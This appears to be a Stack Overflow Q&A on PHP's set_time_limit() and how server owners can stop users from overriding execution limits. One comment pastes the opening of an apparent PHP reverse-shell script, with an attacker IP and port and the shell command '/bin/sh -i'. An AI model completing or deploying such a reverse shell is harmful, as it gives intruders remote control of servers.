# 3 questions about set_time_limit() function in PHP

Tags: php

I have 3 Questions about set_time_limit() function in PHP :

1. when a user doesn't have permission to access PHP.ini can he change the value of the set_time_limit() function ?
2. what can I do to stop restarting set_time_limit() function ?
3. other way: I don't want to run `set_time_limit()`. What can I do?

Comment: i diddn't understand your mean ! if i talk bad sry my English is not good !

Comment: He's talking about the ALL CAPS you had in the question. On the Internet, that's shouting.

Comment: 1: Yes, the user can use set_time_limit() unless PHP is running in safe mode. 2/3: Are you running a server and you want to prevent other users from overriding the timeout? If so, you can use the disabled_functions directive in php.ini to turn set_time_limit off. That way, users won't be able to call that function.

Comment: @shaunc If you're going to answer the question, post it as an answer, not a comment.

Answer (score 1, accepted):

To 1:

Yes a user may call the function even if they don't have access to the php.ini. You may use safe_mode(**DEPRECATED** and **REMOVED** in 5.4) or the `disabled_functions` ini directive to avoid this. However, `set_time_limit` is potentional misleading (read below). If you don't want to change the php.ini it might in a web context  be possible to set the max response-time at the server level or the used cgi config.

To 2 also answers 3:
Disallow the function and/or set `max_execution_time`.

*Note*: `set_time_limit` counts the execution time of the current running php script, **not** the time the script spends waiting on external ressources (Exception ofcourse on windows).

Comment: Thank You for your answer :x the first guy (in up) said that we have not access to php.ini so we cannot change that ! but i didn't get your answer for question one completely ! how can i don't allow the user to change the value ?

Comment: and in answer to question 2 and 3 if i put a huge number in the value it won't be a problem ? or i can use anything else ? and what's max_execution? how can use it ? thanks a lot :X

Comment: If you are in control of the server you can disable certain functions in the php.ini. Access to the php.ini is based on plain file-system permissions. However, there are many php.ini options that may be set on runtime (List [here](http://www.php.net/manual/en/ini.list.php)). `max_execution_time` is the php.ini counterpart of `set_time_limit()`. Setting `max_execution_time`to a high value is usually not a problem as apache/iis will abort long running requests.

Comment: thanks ! I've got It ! :x i have another question ! you said that we can change the set_time_limit() in php.ini . look at this script :  set_time_limit (0); 
$VERSION = "1.0"; 
$ip = '151.233.143.114';  // CHANGE THIS 
$port = 443;       // CHANGE THIS 
$chunk_size = 1400; 
$write_a = null; 
$error_a = null; 
$shell = 'uname -a; w; id; /bin/sh -i'; 
$daemon = 0; $debug = 0;                                                 no php.ini is here ! what anout this ? Thanks alot :x

Comment: There is likely a php.ini involved somewhere. See the results of `phpinfo()` to locate it. Anyway if you have a question unreleated to this one you should ask a new one, if that would not be a duplicate. A way to find it is already **[here](http://stackoverflow.com/a/17850805/2912456)**

Comment: so so so thanks :X just this i'm gonna go just this please ! my php.ini is here :  /etc/php.ini . what version does the set_time_limit() work on it that user can change that ? OR what version of php user can change the value of set_time_limit() ? thanks a lot lot lot :D :X

Answer (score 1):

Your three questions is easily answered by the [PHP Manual - set_time_limit function](http://www.php.net/manual/en/function.set-time-limit.php) of `set_time_limit` function.

**1** - A user only don't have permissions to change the php.ini when it doesn't have the permissions to do so through the file system

**2 and 3** - You can change the `max_execution_time` on php.ini if you have the right permissions. Put on it a huge value (it is not recommended though)